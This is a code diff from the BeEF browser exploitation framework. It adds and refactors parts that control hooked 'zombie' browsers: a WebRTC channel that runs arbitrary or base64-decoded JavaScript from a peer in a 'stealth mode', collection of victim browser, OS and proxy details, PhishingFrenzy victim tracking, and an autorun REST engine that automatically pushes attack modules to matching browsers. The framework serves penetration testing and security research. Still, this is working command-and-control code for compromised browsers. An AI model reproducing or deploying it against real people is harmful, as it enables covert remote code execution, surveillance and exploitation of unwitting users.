this.sendPeerMsg('Going into stealth mode');
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
// This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
@@ -292,11 +277,11 @@ rtcpollPeer = function() {
return;
}
if (beefrtcs[rtcstealth].verbose) {console.log('lub dub');}
beef.debug('lub dub');
beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 3);
setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
}
// When a data channel has been established - within here is the message handling function as well
@@ -308,12 +293,12 @@ Beefwebrtc.prototype.onDataChannel = function(event) {
}
}
if (beefrtcs[peerid].verbose) {console.log("Peer: " + peerid + " has just handled the onDataChannel event");}
beef.debug("Peer: " + peerid + " has just handled the onDataChannel event");
rtcrecvchan[peerid] = event.channel;
// This is the onmessage event handling within the datachannel
rtcrecvchan[peerid].onmessage = function(ev2) {
if (beefrtcs[peerid].verbose) {console.log("Received an RTC message from my peer["+peerid+"]: " + ev2.data);}
beef.debug("Received an RTC message from my peer["+peerid+"]: " + ev2.data);
// We've received the command to go into stealth mode
if (ev2.data == "!gostealth") {
@@ -333,22 +318,34 @@ Beefwebrtc.prototype.onDataChannel = function(event) {
// Command to perform arbitrary JS (while stealthed)
} else if ((rtcstealth != false) && (ev2.data.charAt(0) == "%")) {
if (beefrtcs[peerid].verbose) {console.log('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');}
beef.debug('message was a command: '+ev2.data.substring(1) + ' .. and I am in stealth mode');
beefrtcs[rtcstealth].sendPeerMsg("Command result - " + beefrtcs[rtcstealth].execCmd(ev2.data.substring(1)));
// Command to perform arbitrary JS (while NOT stealthed)
} else if ((rtcstealth == false) && (ev2.data.charAt(0) == "%")) {
if (beefrtcs[peerid].verbose) {console.log('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));}
beef.debug('message was a command - we are not in stealth. Command: '+ ev2.data.substring(1));
beefrtcs[peerid].sendPeerMsg("Command result - " + beefrtcs[peerid].execCmd(ev2.data.substring(1)));
// B64d command from the /cmdexec API
} else if (ev2.data.charAt(0) == "@") {
beef.debug('message was a b64d command');
var fn = new Function(atob(ev2.data.substring(1)));
fn();
if (rtcstealth != false) { // force stealth back on ?
beef.updater.execute_commands(); // FORCE execution while stealthed
beef.updater.lock = true;
}
// Just a plain text message .. (while stealthed)
} else if (rtcstealth != false) {
if (beefrtcs[peerid].verbose) {console.log('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');}
beef.debug('received a message, apparently we are in stealth - so just send it back to peer['+rtcstealth+']');
beefrtcs[rtcstealth].sendPeerMsg(ev2.data);
// Just a plan text message (while NOT stealthed)
} else {
if (beefrtcs[peerid].verbose) {console.log('received a message from peer['+peerid+'] - sending it back to beef');}
beef.debug('received a message from peer['+peerid+'] - sending it back to beef');
beef.net.send('/rtcmessage',0,{peerid: peerid, message: ev2.data});
}
}
@@ -363,30 +360,30 @@ Beefwebrtc.prototype.execCmd = function(input) {
// Shortcut function to SEND a data messsage
Beefwebrtc.prototype.sendPeerMsg = function(msg) {
if (this.verbose) {console.log('sendPeerMsg to ' + this.peerid);}
beef.debug('sendPeerMsg to ' + this.peerid);
this.dataChannel.send(msg);
}
// Try and initiate, will check that system hasn't started, and that signaling is ready, and that TURN servers are ready
Beefwebrtc.prototype.maybeStart = function() {
if (this.verbose) {console.log("maybe starting ... ");}
beef.debug("maybe starting ... ");
if (!this.started && this.signalingReady && this.turnDone) {
if (this.verbose) {console.log('Creating PeerConnection.');}
beef.debug('Creating PeerConnection.');
this.createPeerConnection();
this.started = true;
if (this.initiator) {
if (this.verbose) {console.log("Making the call now .. bzz bzz");}
beef.debug("Making the call now .. bzz bzz");
this.doCall();
} else {
if (this.verbose) {console.log("Receiving a call now .. somebuddy answer da fone?");}
beef.debug("Receiving a call now .. somebuddy answer da fone?");
this.calleeStart();
}
} else {
if (this.verbose) {console.log("Not ready to start just yet..");}
beef.debug("Not ready to start just yet..");
}
}
@@ -395,8 +392,8 @@ Beefwebrtc.prototype.doCall = function() {
var constraints = this.mergeConstraints(this.offerConstraints, this.sdpConstraints);
var self = this;
globalrtc[this.peerid].createOffer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, constraints);
if (this.verbose) {console.log('Sending offer to peer, with constraints: \n' +
' \'' + JSON.stringify(constraints) + '\'.');}
beef.debug('Sending offer to peer, with constraints: \n' +
' \'' + JSON.stringify(constraints) + '\'.');
}
// Helper method to merge SDP constraints
@@ -424,30 +421,28 @@ Beefwebrtc.prototype.setLocalAndSendMessage = function(sessionDescription) {
peerid = beefrtcs[k].peerid;
}
}
if (beefrtcs[peerid].verbose) {console.log("For peer: " + peerid + " Running setLocalAndSendMessage...");}
beef.debug("For peer: " + peerid + " Running setLocalAndSendMessage...");
globalrtc[peerid].setLocalDescription(sessionDescription, onSetSessionDescriptionSuccess, onSetSessionDescriptionError);
beefrtcs[peerid].sendSignalMsg(sessionDescription);
function onSetSessionDescriptionSuccess() {
if (beefrtcs[peerid].verbose) {console.log('Set session description success.');}
beef.debug('Set session description success.');
}
function onSetSessionDescriptionError() {
if (beefrtcs[peerid].verbose) {console.log('Failed to set session description');}
beef.debug('Failed to set session description');
}
}
// If the browser can't build an SDP
Beefwebrtc.prototype.onCreateSessionDescriptionError = function(error) {
var localverbose = false;
beef.debug('Failed to create session description: ' + error.toString());
}
for (var k in beefrtcs) {
if (beefrtcs[k].verbose === true) {
localverbose = true;
}
}
if (localverbose === true) {console.log('Failed to create session description: ' + error.toString());}
// If the browser successfully sets a remote description
Beefwebrtc.prototype.onSetRemoteDescriptionSuccess = function() {
beef.debug('Set remote session description successfully');
}
// Check for messages - which includes signaling from a calling peer - this gets kicked off in maybeStart()
@@ -461,19 +456,63 @@ Beefwebrtc.prototype.calleeStart = function() {
// Process messages, this is how we handle the signaling messages, such as candidate info, offers, answers
Beefwebrtc.prototype.processSignalingMessage = function(message) {
if (!this.started) {
if (this.verbose) {console.log('peerConnection has not been created yet!');}
beef.debug('peerConnection has not been created yet!');
return;
}
if (message.type === 'offer') {
if (this.verbose) {console.log("Processing signalling message: OFFER");}
this.setRemote(message);
this.doAnswer();
beef.debug("Processing signalling message: OFFER");
if (navigator.mozGetUserMedia) { // Mozilla shim fuckn shit - since the new
// version of FF - which no longer works
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {
// globalrtc[this.peerid].createAnswer(function(answer) {
// globalrtc[this.peerid].setLocalDescription(
var peerid = null;
for (var k in beefrtcs) {
if (beefrtcs[k].allgood === false) {
peerid = beefrtcs[k].peerid;
}
}
globalrtc[peerid].createAnswer(function(answer) {
globalrtc[peerid].setLocalDescription(
new RTCSessionDescription(answer),
function() {
beefrtcs[peerid].sendSignalMsg(answer);
},function(error) {
beef.debug("setLocalDescription error: " + error);
});
},function(error) {
beef.debug("createAnswer error: " +error);
});
},function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
this.doAnswer();
}
} else if (message.type === 'answer') {
if (this.verbose) {console.log("Processing signalling message: ANSWER");}
this.setRemote(message);
beef.debug("Processing signalling message: ANSWER");
if (navigator.mozGetUserMedia) { // terrible moz shim - as for the offer
beef.debug("Moz shim here");
globalrtc[this.peerid].setRemoteDescription(
new RTCSessionDescription(message),
function() {},
function(error) {
beef.debug("setRemoteDescription error: " + error);
});
} else {
this.setRemote(message);
}
} else if (message.type === 'candidate') {
if (this.verbose) {console.log("Processing signalling message: CANDIDATE");}
beef.debug("Processing signalling message: CANDIDATE");
var candidate = new RTCIceCandidate({sdpMLineIndex: message.label,
candidate: message.candidate});
this.noteIceCandidate("Remote", this.iceCandidateType(message.candidate));
@@ -486,16 +525,12 @@ Beefwebrtc.prototype.processSignalingMessage = function(message) {
// Used to set the RTC remote session
Beefwebrtc.prototype.setRemote = function(message) {
globalrtc[this.peerid].setRemoteDescription(new RTCSessionDescription(message),
onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
function onSetRemoteDescriptionSuccess() {
if (this.verbose) {console.log("Set remote session description success.");}
}
this.onSetRemoteDescriptionSuccess, this.onSetSessionDescriptionError);
}
// As part of the processSignalingMessage function, we check for 'offers' from peers. If there's an offer, we answer, as below
Beefwebrtc.prototype.doAnswer = function() {
if (this.verbose) {console.log('Sending answer to peer.');}
beef.debug('Sending answer to peer.');
globalrtc[this.peerid].createAnswer(this.setLocalAndSendMessage, this.onCreateSessionDescriptionError, this.sdpConstraints);
}
@@ -512,31 +547,17 @@ Beefwebrtc.prototype.iceCandidateType = function(candidateSDP) {
// Event handler for successful addition of ICE Candidates
Beefwebrtc.prototype.onAddIceCandidateSuccess = function() {
var localverbose = false;
for (var k in beefrtcs) {
if (beefrtcs[k].verbose === true) {
localverbose = true;
}
}
if (localverbose === true) {console.log('AddIceCandidate success.');}
beef.debug('AddIceCandidate success.');
}
// Event handler for unsuccessful addition of ICE Candidates
Beefwebrtc.prototype.onAddIceCandidateError = function(error) {
var localverbose = false;
for (var k in beefrtcs) {
if (beefrtcs[k].verbose === true) {
localverbose = true;
}
}
if (localverbose === true) {console.log('Failed to add Ice Candidate: ' + error.toString());}
beef.debug('Failed to add Ice Candidate: ' + error.toString());
}
// If a peer hangs up (we bring down the peerconncetion via the stop() method)
Beefwebrtc.prototype.onRemoteHangup = function() {
if (this.verbose) {console.log('Session terminated.');}
beef.debug('Session terminated.');
this.initiator = 0;
// transitionToWaiting();
this.stop();
@@ -585,4 +606,4 @@ beef.webrtc = {
}
}
}
beef.regCmp('beef.webrtc');
beef.regCmp('beef.webrtc');

4
core/main/console/banners.rb
View File

@@ -86,7 +86,9 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
if configuration.get("beef.extension.admin_ui.enable")
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
end
print_more data
end

4
core/main/constants/os.rb
View File

@@ -20,6 +20,8 @@ module BeEF
OS_MAC_IMG = 'mac.png'
OS_QNX_UA_STR = 'QNX'
OS_QNX_IMG = 'qnx.ico'
OS_SUNOS_UA_STR = 'SunOS'
OS_SUNOS_IMG = 'sunos.gif'
OS_BEOS_UA_STR = 'BeOS'
OS_BEOS_IMG = 'beos.png'
OS_OPENBSD_UA_STR = 'OpenBSD'
@@ -54,6 +56,8 @@ module BeEF
OS_MAC_UA_STR
when /qnx/
OS_QNX_UA_STR
when /sun/
OS_SUNOS_UA_STR
when /beos/
OS_BEOS_UA_STR
when /openbsd/

60
core/main/handlers/browserdetails.rb
View File

@@ -177,6 +177,12 @@ module BeEF
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
if config.get("beef.extension.network.enable") == true
if proxy_server =~ /^([\d\.]+):([\d]+)$/
print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy')
end
end
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
@@ -209,7 +215,7 @@ module BeEF
self.err_msg "Invalid cookies returned from the hook browser's initial connection."
end
# get and store the os name
# get and store the OS name
os_name = get_param(@data['results'], 'OsName')
if BeEF::Filters.is_valid_osname?(os_name)
BD.set(session_id, 'OsName', os_name)
@@ -217,6 +223,10 @@ module BeEF
self.err_msg "Invalid operating system name returned from the hook browser's initial connection."
end
# get and store the OS version (without checks as it can be very different or even empty, for instance on linux/bsd)
os_version = get_param(@data['results'], 'OsVersion')
BD.set(session_id, 'OsVersion', os_version)
# get and store default browser
default_browser = get_param(@data['results'], 'DefaultBrowser')
BD.set(session_id, 'DefaultBrowser', default_browser)
@@ -312,8 +322,8 @@ module BeEF
# get and store the yes|no value for browser components
components = [
'VBScriptEnabled', 'HasFlash', 'HasPhonegap', 'HasGoogleGears',
'HasFoxit', 'HasWebSocket', 'HasWebRTC', 'HasActiveX',
'HasSilverlight', 'HasQuickTime', 'HasRealPlayer', 'HasWMP',
'HasWebSocket', 'HasWebRTC', 'HasActiveX',
'HasQuickTime', 'HasRealPlayer', 'HasWMP',
'hasSessionCookies', 'hasPersistentCookies'
]
components.each do |k|
@@ -341,41 +351,33 @@ module BeEF
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# Call autorun modules
if config.get('beef.autorun.enable')
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
if v.has_key?('autorun') and v['autorun'] == true
target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Module.execute(k, session_id)
autorun.push(k)
elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
BeEF::Module.execute(k, session_id)
autorun.push(k)
else
print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
end
}
if autorun.length > 0
print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
end
end
if config.get('beef.integration.phishing_frenzy.enable')
# get and store the browser plugins
victim_uid = get_param(@data['results'], 'PhishingFrenzyUID')
print_debug "PhishingFrenzy victim UID is #{victim_uid}"
if BeEF::Filters.alphanums_only?(victim_uid)
BD.set(session_id, 'PhishingFrenzyUID', victim_uid)
else
self.err_msg "Invalid PhishingFrenzy Victim UID returned from the hook browser's initial connection."
end
end
# log a few info of newly hooked zombie in the console
print_info "New Hooked Browser [id:#{zombie.id}, ip:#{zombie.ip}, browser:#{browser_name}-#{browser_version}, os:#{os_name}-#{os_version}], hooked domain [#{log_zombie_domain}:#{log_zombie_port.to_s}]"
# add localhost as network host
if config.get('beef.extension.network.enable')
print_debug("Hooked browser has network interface 127.0.0.1")
BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => '127.0.0.1', :hostname => 'localhost', :os => BeEF::Core::Models::BrowserDetails.get(session_id, 'OsName'))
end
# Autorun Rule Engine - Check if the hooked browser type/version and OS type/version match any Rule-sets
# stored in the BeEF::Core::AutorunEngine::Models::Rule database table
# If one or more Rule-sets do match, trigger the module chain specified
#
are = BeEF::Core::AutorunEngine::Engine.instance
match_rules = are.match(browser_name, browser_version, os_name, os_version)
are.trigger(match_rules, zombie.id) if match_rules.length > 0
end
def get_param(query, key)

11
core/main/handlers/commands.rb
View File

@@ -42,7 +42,7 @@ module BeEF
# @note get and check session id from the request
beefhook = get_param(@data, 'beefhook')
(print_error "BeEFhook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
(print_error "BeEF hook is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
result = get_param(@data, 'results')
@@ -57,11 +57,14 @@ module BeEF
# @note get/set details for datastore and log entry
command_friendly_name = command.friendlyname
(print_error "command friendly name is empty"; return) if command_friendly_name.empty?
command_results = get_param(@data, 'results')
(print_error "command results are empty"; return) if command_results.empty?
command_status = @data['status']
command_results = @data['results']
(print_error "command results or status are empty"; return) if command_results.empty?
# @note save the command module results to the datastore and create a log entry
command_results = {'data' => command_results}
BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results)
BeEF::Core::Models::Command.save_result(beefhook, command_id, command_friendly_name, command_results, command_status)
end

7
core/main/handlers/hookedbrowsers.rb
View File

@@ -79,6 +79,13 @@ module Handlers
zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
zombie_commands.each{|command| add_command_instructions(command, hooked_browser)}
# TODO this is not considering WebSocket channel, as data is sent from core/main/handlers/modules/command.rb if WS is enabled
are_executions = BeEF::Core::AutorunEngine::Models::Execution.all(:is_sent => false, :session => hook_session_id)
are_executions.each do |are_exec|
@body += are_exec.mod_body
are_exec.update(:is_sent => true, :exec_time => Time.new.to_i)
end
# @note We dynamically get the list of all browser hook handler using the API and register them
BeEF::API::Registrar.instance.fire(BeEF::API::Server::Hook, 'pre_hook_send', hooked_browser, @body, @params, request, response)
end

5
core/main/handlers/modules/beefjs.rb
View File

@@ -21,16 +21,17 @@ module BeEF
beef_js_path = "#{$root_dir}/core/main/client/"
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js lib/webrtcadapter.js)
ext_js_sub_files = %w(lib/jquery-1.10.2.min.js lib/jquery-migrate-1.2.1.min.js lib/evercookie.js lib/json2.js lib/mdetect.js lib/jquery.blockUI.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/connection.js net/cors.js are.js)
# @note Load websocket library only if WS server is enabled in config.yaml
if config.get("beef.http.websocket.enable") == true
beef_js_sub_files << "websocket.js"
end
# @note Load webrtc library only if WebRTC extension is enabled
if config.get("beef.extension.webrtc.enable") == true
beef_js_sub_files << "lib/webrtcadapter.js"
beef_js_sub_files << "webrtc.js"
end

2
core/main/handlers/modules/command.rb
View File

@@ -38,7 +38,7 @@ module BeEF
command_module.build_datastore(command.data)
command_module.pre_send
build_missing_beefjs_components(command_module.beefjs_components) if not command_module.beefjs_components.empty?
build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
ws = BeEF::Core::Websocket::Websocket.instance

1
core/main/models/browserdetails.rb
View File

@@ -83,6 +83,7 @@ module Models
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_SUNOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_SUNOS_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR
return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR

27
core/main/models/command.rb
View File

@@ -23,12 +23,13 @@ module Models
has n, :results
# Save results and flag that the command has been run on the hooked browser
# @param [String] hook_session_id The session_id.
# @param [String] command_id The command_id.
# @param [String] command_friendly_name The command friendly name.
# @param [String] result The result of the command module.
def self.save_result(hook_session_id, command_id, command_friendly_name, result)
def self.save_result(hook_session_id, command_id, command_friendly_name, result, status)
# @note enforcing arguments types
command_id = command_id.to_i
@@ -37,6 +38,7 @@ module Models
raise Exception::TypeError, '"command_id" needs to be an integer' if not command_id.integer?
raise Exception::TypeError, '"command_friendly_name" needs to be a string' if not command_friendly_name.string?
raise Exception::TypeError, '"result" needs to be a hash' if not result.hash?
raise Exception::TypeError, '"status" needs to be an integer' if not status.integer?
# @note get the hooked browser structure and id from the database
hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => hook_session_id) || nil
@@ -51,20 +53,29 @@ module Models
raise Exception::TypeError, "command is nil" if command.nil?
# @note create the entry for the results
command.results.new(:hooked_browser_id => hooked_browser_id, :data => result.to_json, :date => Time.now.to_i)
command.results.new(:hooked_browser_id => hooked_browser_id,
:data => result.to_json,:status => status,:date => Time.now.to_i)
command.save
# @note log that the result was returned
BeEF::Core::Logger.instance.register('Command', "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']", hooked_browser_id)
s = self.show_status(status)
log = "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions (status: #{s}) from command module [id:#{command_id}, name:'#{command_friendly_name}']"
BeEF::Core::Logger.instance.register('Command', log, hooked_browser_id)
print_info log
end
# @note prints the event into the console
if BeEF::Settings.console?
print_info "Hooked browser [id:#{hooked_browser.id}, ip:#{hooked_browser.ip}] has executed instructions from command module [id:#{command_id}, name:'#{command_friendly_name}']"
def self.show_status(status)
case status
when -1
result = 'ERROR'
when 1
result = 'SUCCESS'
else
result = 'UNKNOWN'
end
result
end
end
end
end
end

1
core/main/models/result.rb
View File

@@ -15,6 +15,7 @@ module Models
property :id, Serial
property :date, String, :length => 15, :lazy => false
property :status, Integer
property :data, Text
end

25
core/main/network_stack/assethandler.rb
View File

@@ -59,16 +59,33 @@ module Handlers
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)
# @param [String] extension Extension to append to the URL path (can be nil for none)
# @param [String] extension File extension (.x). If == nil content-type is text/plain, otherwise use the right one via MIME::Types.type_for()
# @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
# @return [String] URL Path of mounted asset
# @todo This function should accept a hooked browser session to limit the mounted file to a certain session
def bind(file, path=nil, extension=nil, count=-1)
url = build_url(path, extension)
@allocations[url] = {'file' => "#{root_dir}"+file, 'path' => path, 'extension' => extension, 'count' => count}
@http_server.mount(url, Rack::File.new(@allocations[url]['file']))
@allocations[url] = {'file' => "#{root_dir}"+file,
'path' => path,
'extension' => extension,
'count' => count}
resp_body = File.read("#{root_dir}#{file}")
if extension.nil? || MIME::Types.type_for(extension).empty?
content_type = 'text/plain'
else
content_type = MIME::Types.type_for(extension).first.content_type
end
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new('200', {'Content-Type' => content_type}, resp_body)
)
@http_server.remap
print_info "File [" + "#{root_dir}"+file + "] bound to url [" + url + "]"
print_info "File [#{file}] bound to Url [#{url}] using Content-type [#{content_type}]"
url
end

9
core/main/network_stack/handlers/dynamicreconstruction.rb
View File

@@ -32,14 +32,17 @@ module BeEF
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST, GET'
PQ << {
begin
PQ << {
:beefhook => params[:bh],
:stream_id => Integer(params[:sid]),
:packet_id => Integer(params[:pid]),
:packet_count => Integer(params[:pc]),
:data => params[:d]
}
}
rescue TypeError, ArgumentError => e
print_error "Hooked browser returned an invalid argument: #{e}"
end
Thread.new {
check_packets()

13
core/main/network_stack/handlers/raw.rb
View File

@@ -10,14 +10,19 @@ module BeEF
class Raw
def initialize(status, header={}, body)
def initialize(status, header={}, body=nil)
@status = status
@header = header
@body = body
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
# [@status, @header, @body]
@response = Rack::Response.new(
body = @body,
status = @status,
header = @header
)
end
private

10
core/main/network_stack/websocket/websocket.rb
View File

@@ -168,8 +168,9 @@ module BeEF
begin
secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
ws.onmessage { |msg|
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
begin
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
if (msg_hash["cookie"]!= nil)
print_debug("WebSocket - Browser says helo! WebSocket is running")
#insert new connection in activesocket
@@ -202,9 +203,12 @@ module BeEF
#print_debug("Received from WebSocket #{messageHash}")
execute(msg_hash)
end
rescue => e
print_error "WebSocket - something wrong in msg handling - skipped: #{e}"
end
}
rescue => e
print_error "WebSocket error: #{e}"
print_error "WebSocket staring error: #{e}"
end
end
}

9
core/main/rest/api.rb
View File

@@ -43,13 +43,20 @@ module BeEF
end
end
module RegisterAutorunHandler
def self.mount_handler(server)
server.mount('/api/autorun', BeEF::Core::Rest::AutorunEngine.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAutorunHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

133
core/main/rest/handlers/autorun_engine.rb Normal file
View File

@@ -0,0 +1,133 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class AutorunEngine < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# Add a new ruleset. Returne the rule_id if request was successful
post '/rule/add' do
request.body.rewind
begin
data = JSON.parse request.body.read
rloader = BeEF::Core::AutorunEngine::RuleLoader.instance
rloader.load(data).to_json
rescue => e
err = 'Malformed JSON ruleset.'
print_error "[ARE] ERROR: #{e.message}"
{ 'success' => false, 'error' => err }.to_json
end
end
# Delete a ruleset
get '/rule/delete/:rule_id' do
begin
rule_id = params[:rule_id]
rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
rule.destroy
{ 'success' => true}.to_json
rescue => e
err = 'Error getting rule.'
print_error "[ARE] ERROR: #{e.message}"
{ 'success' => false, 'error' => err }.to_json
end
end
# Trigger a specified rule_id on online hooked browsers. Offline hooked browsers are ignored
get '/rule/trigger/:rule_id' do
begin
rule_id = params[:rule_id]
online_hooks = BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15))
are = BeEF::Core::AutorunEngine::Engine.instance
if online_hooks != nil
online_hooks.each do |hb|
hb_details = BeEF::Core::Models::BrowserDetails
browser_name = hb_details.get(hb.session, 'BrowserName')
browser_version = hb_details.get(hb.session, 'BrowserVersion')
os_name = hb_details.get(hb.session, 'OsName')
os_version = hb_details.get(hb.session, 'OsVersion')
match_rules = are.match(browser_name, browser_version, os_name, os_version, rule_id)
are.trigger(match_rules, hb.id) if match_rules.length > 0
end
{ 'success' => true }.to_json
else
{ 'success' => false, 'error' => 'There are currently no hooked browsers online.' }.to_json
end
rescue => e
err = 'Malformed JSON ruleset.'
print_error "[ARE] ERROR: #{e.message}"
{ 'success' => false, 'error' => err }.to_json
end
end
# Delete a ruleset
get '/rule/list/:rule_id' do
begin
rule_id = params[:rule_id]
if rule_id == 'all'
result = Array.new
rules = BeEF::Core::AutorunEngine::Models::Rule.all
rules.each do |rule|
{
'id' => rule.id,
'name'=> rule.name,
'author'=> rule.author,
'browser'=> rule.browser,
'browser_version'=> rule.browser_version,
'os'=> rule.os,
'os_version'=> rule.os_version,
'modules'=> rule.modules,
'execution_order'=> rule.execution_order,
'execution_delay'=> rule.execution_delay,
'chain_mode'=> rule.chain_mode
}
result.push rule
end
else
result = nil
rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
if rule != nil
result = {
'id' => rule.id,
'name'=> rule.name,
'author'=> rule.author,
'browser'=> rule.browser,
'browser_version'=> rule.browser_version,
'os'=> rule.os,
'os_version'=> rule.os_version,
'modules'=> rule.modules,
'execution_order'=> rule.execution_order,
'execution_delay'=> rule.execution_delay,
'chain_mode'=> rule.chain_mode
}
end
end
{ 'success' => true, 'rules' => result}.to_json
rescue => e
err = 'Error getting rule(s)'
print_error "[ARE] ERROR: #{e.message}"
{ 'success' => false, 'error' => err }.to_json
end
end
end
end
end
end

44
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -120,6 +120,29 @@ module BeEF
result.to_json
end
# useful when you inject the BeEF hook in MITM situations (see MITMf) and you want to feed back
# to BeEF a more accurate OS type/version and architecture information
post '/update/:session' do
body = JSON.parse request.body.read
os = body['os']
os_version = body['os_version']
